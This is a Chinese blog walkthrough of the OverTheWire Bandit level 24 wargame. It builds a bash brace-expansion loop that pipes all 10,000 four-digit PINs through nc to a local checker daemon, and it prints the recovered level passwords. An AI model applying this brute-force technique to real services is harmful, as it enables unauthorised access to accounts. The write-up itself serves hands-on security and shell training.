Wargames与bash知识16

最新推荐文章于 2024-07-23 10:48:30 发布
最新推荐文章于 2024-07-23 10:48:30 发布
阅读量1k 收藏 10
点赞数 35
文章标签: bash chrome 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gu720226/article/details/135567763
版权

Wargames与bash知识16

Bandit24

关卡提示:

  一个守护进程正在端口30002上侦听,如果给定bandit24的密码和一个4位数的密码,它将为您提供bandit25的密码。没有办法检索pincode,除非遍历所有10000个组合,称为暴力强制。

您不需要每次都创建新的连接

这一关用了很长的时间才获得的密码
从关卡提示来看,我第一想到的循环,其次是构建四位数0001—9999。构建数字列表我先想到的是seq命令和花括号扩展。
先在终端命令行看看效果:

bandit24@bandit:~$ seq -w 0001 0009
0001
0002
0003
0004
0005
0006
0007
0008
0009
bandit24@bandit:~$ echo {0001..0009}
0001 0002 0003 0004 0005 0006 0007 0008 0009

先用用户bandit24登录,给30002发一个字符串看看

bandit24@bandit:~$ echo "fdsafsadsf" |nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Fail! You did not supply enough data. Try again.
gfffffffffffff 33
Timeout. Exiting.
bandit24@bandit:~$ gfffffffffffff 33
gfffffffffffff: command not found

获得提示:
1、 我是用户bandit25的密码检查器。请在一行中输入用户bandit24的密码和密码,并用空格分隔。
2、 连接到出现超时中间有时间间隔
3、 输入字符gfffffffffffff 33,用户输入被阻隔直到提示符出现。

我最后选择使用了花括号扩展写了一个脚本,下面是脚本内容。设置9个数字用于检测效果

bandit24@bandit:/tmp/bdit25$ cat it25
#!/bin/bash
  for i in {0001..0009};do
  echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ $i |nc localhost 30002
  done


bandit24@bandit:/tmp/bdit25$ ./it25
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.
………省略
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.

使用脚本发现效率奇低,每次循环发送一次字符,然后需等待阻塞结束才会执行下一次循环。回头看提示:有“您不需要每次都创建新的连接“提示,说明使用循环的方法不是最佳的选择。直接用echo给30002端口发送字符串会怎么样呢?

bandit24@bandit:~$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009} |nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Timeout. Exiting.

执行命令echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…0009} |nc localhost 30002后发现,给端口30002发送字符串只执行了一次。将echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…0009}输出重定向到log文件,查看log发现花括号扩展的结果是一行。

bandit24@bandit:/tmp/bdit25$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009} >>log
bandit24@bandit:/tmp/bdit25$ cat -n log
     1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009
bandit24@bandit:/tmp/bdit25$
bandit24@bandit:/tmp/bdit25$ ls
it25  log
bandit24@bandit:/tmp/bdit25$ rm log
bandit24@bandit:/tmp/bdit25$ echo VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009}\n >>log
bandit24@bandit:/tmp/bdit25$ cat -n log
     1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009n
bandit24@bandit:/tmp/bdit25$ rm log
bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009}\n >>log
bandit24@bandit:/tmp/bdit25$ cat -n log
     1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008n VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009n
bandit24@bandit:/tmp/bdit25$ rm log
bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..0009}\\n >>log
bandit24@bandit:/tmp/bdit25$ cat -n log
     1  VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001
     2   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002
     3   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003
     4   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004
     5   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005
     6   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006
     7   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007
     8   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008
     9   VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009
    10

经过测试发现:echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…9999}\n符合要求,现在尝试发送到30002端口,这次很快就获得了密码。

bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..9999}\\n |nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
……
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d

Exiting.
bandit24@bandit:/tmp/bdit25$

其他尝试,使用echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001…9999}\n重定向一个文件,然后将文件内容发送至30002。虽然理论可行,但我在服务器没有实现,提示Wrong的错误到一定行数就像停止了一样。

bandit24@bandit:~$ cd /tmp/bdit25
bandit24@bandit:/tmp/bdit25$ echo -e VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar\ {0001..9999}\\n >>zidian
bandit24@bandit:/tmp/bdit25$ head zidian
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0001
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0002
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0003
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0004
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0005
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0006
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0007
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0008
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0009
 VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 0010
老寒号鸟
关注
  • 35
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
170814 WarGames-Bandit25
whklhhhh的博客
08-14 534
1625-5 王子昂 总结《2017年8月14日》 【连续第316天总结】 A. WarGames-Bandit B. Level 25提示为bandit26使用的不是/bin/bash,直接提供了ssh key,很容易登录 但是登录以后显示了一大段东西就退出了 查看/etc/passwd文件,该文件保存了各用户的id、目录和shellbandit26:x:11026:11026:ba
Wargamesbash知识07
gu720226的博客
01-02 1228
密码存储在文件data.txt中,该文件是经过重复压缩的文件的十六进制文件。在本关卡,在/tmp下创建一个目录可能很有用,您可以/tmp使用mkdir创建目录(例如:mkdir/tmp/myname123),然后使用cp复制数据文件,并使用mv重命名它(阅读手册页!若没有加上任何参数,bzip2压缩完文件后会产生.bz2的压缩文件,并删除原始的文件。-f或–force  bzip2在压缩或解压缩时,若输出文件与现有文件同名,预设不会覆盖现有文件。-c或–stdout  将压缩与解压缩的结果送到标准输出。
Wargamesbash知识01
gu720226的博客
12-27 509
1、cat “spaces in this filename”: 使用双引号注明spaces in this filename是一个有空格字符串,是can命令的一个参数。PS2:我在bash(GNU bash,版本 5.0.17(1)-release (x86_64-pc-linux-gnu))试图建一个文件名有空格的文件,建立的有空格文件名会自动多出来一对单引号将文件名括起来。双引号引用是不完全引用,双引号中有一些特殊符号仍然保持其特殊的作用,如美元符号“$”、反引号“`”、转移符号反斜杠“\”。
Wargamesbash知识
gu720226的博客
12-26 451
无意发现一个学习bash的游戏Wargames,也有网友说是黑客训练游戏,不管是啥,只要能够学习bash就足够了。网址:https://overthewire.org/wargames/网页上的游戏推荐第一个游戏是:bandit,那咱们就从这个开始。
Wargamesbash知识15
gu720226的博客
01-12 898
脚本的目的是bandit24用户给用户bandit23留了一个“后门”,每分钟运行/var/spool/$myname/foo目录下,文件所有者是bandit23的所有脚本,如果脚本文件文件运行60秒未结束,发送信号9( SIGKILL)强制结束进程。根据关卡提示、上面的脚本和以前的经验,我们可以写一个脚本将/etc/bandit_pass/目录下的密码文件bandit24的内容通过重定向保存在/tmp下。拷贝/tmp/bdit24/bd24到/var/spool/ bandit24/foo。
Wargamesbash知识05
gu720226的博客
12-31 877
您对帮助中描述“您也许需要事先对输入排序,或使用 “sort -u” 而非 "uniq"怎么看?”、“+”、“*”。正则表达式主要依赖于元字符,元字符都有特殊的含义,一些元字符写在方括号中的时候有一些特殊的意思。若域中为先空字符(通常包括空格以及制表符),然后非空字符,域中字符前的空字符将被跳过。1、最好使用egrep或者grep -E以防止扩展正则未开启而造成的困扰。您也许需要事先对输入排序,或使用 “sort -u” 而非 “uniq”。提示:“uniq” 不会检查重复的行,除非它们是相邻的行。
Wargamesbash知识14
gu720226的博客
01-11 1099
f, --fields=列表 只选中指定的这些域;仅使用f -b, -c 或-f 中的一个。-s, --only-delimited 不打印没有包含分界符的行。-b, --bytes=列表 只选中指定的这些字节。-c, --characters=列表 只选中指定的这些字符。N-M 从第N个开始到第M个之间(包括第M个)的所有字符、字节或域。-M 从第1个开始到第M个之间(包括第M个)的所有字符、字节或域。
Wargamesbash知识09
gu720226的博客
01-05 2215
Nmap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包。它由Fyodor编写并维护。由于Nmap品质卓越,使用灵活,它已经是渗透测试人员必备的工具。其基本功能有三个:(1)是扫描主机端口,嗅探所提供的网络服务(2)是探测一组主机是否在线(3)还可以推断主机所用的操作系统,到达主机经过的路由,系统已开放端口的软件版本。
Wargamesbash知识08
gu720226的博客
01-04 1711
要使用openssl s_client建立SSL连接,需要提供服务器地址和端口号,以及证书、私钥等信息来确保连接的安全性。例如,可以使用-host和-port选项指定服务器地址和端口号,使用-cert和-key选项指定客户端证书和私钥,使用-CAfile选项指定根证书,使用-cipher选项指定加密方法等。SSL/TLS 协议的实现:OpenSSL 支持 SSLv2、SSLv3 和 TLSv1.0、TLSv1.1、TLSv1.2 等版本的 SSL/TLS 协议,并提供了相关的工具和库,用于实现安全的通信。
LinuxBash编程与脚本应用实战
07-23
资源名称:Linux Bash编程与脚本应用实战资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
Bash与Csh比较
01-06
Bash与Csh比较,在linux下的bash与csh的区别及用法,很实用
Bash参考手册.pdf
08-28
Bash参考手册.pdf是Bash shell的官方参考手册,涵盖了Bash shell的所有方面,包括基本语法、变量、命令、函数、文件处理、流程控制、输入输出、错误处理等。 1. Bash简介 Bash是GNU项目的一部分,是自由软件基金会...
mingw跨平台bash环境
03-28
标题“mingw跨平台bash环境”指出,我们将在Windows系统中搭建一个基于MingW的Bash shell环境,它允许用户使用与Linux相似的命令行界面和脚本语言。这不仅对那些习惯于Linux工作流的开发者有极大帮助,同时也为在...
bash官方手册/Bash Reference Manual
05-02
"bash 官方手册/Bash Reference Manual" bash 官方手册是 GNU 项目的一部分,由 Chet Ramey 和 Brian Fox 编写,提供了 Bash shell 的详细参考手册。该手册涵盖了 Bash shell 的所有方面,包括基本语法、shell ...
RKNN执行bash ./build-linux_RK3566_RK3568.sh 报错
qq_53545309的博客
07-20 37
报错信息:解决办法:编译器问题,终端执行:
【Linux】执行命令提示:-bash: !@#‘“: event not found
weixin_47610533的博客
07-20 248
在Linux下执行命令时,提示:-bash: xxx event not found,是因为一些特殊字符无法,无法识别博主是在使用Docker启动xxl-job-admin时,由于设置的-e 数据库密码参数时,存在特殊字符,导致Docker容器启动后,无法绑定-e 参数,访问管理页面提示连接不上数据库。启动命令。
zabbix添加钉钉告警机器人使用bash和python两种脚本
最新发布
xzlAwin的博客
07-23 188
zabbix添加钉钉告警机器人使用bash和python两种脚本
bash 笔记
waterHBO的博客
07-22 410
【代码】bash 笔记。
Bash4.0中文翻译与实用指南
"Bash 4.0参考文档"不仅是一份技术指南,也是一本实用的学习工具,涵盖了Bash语言的基础知识、语法、环境变量管理、流控制、函数定义、参数传递等核心内容,是Linux系统管理员、软件开发者和Shell编程爱好者的必备...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值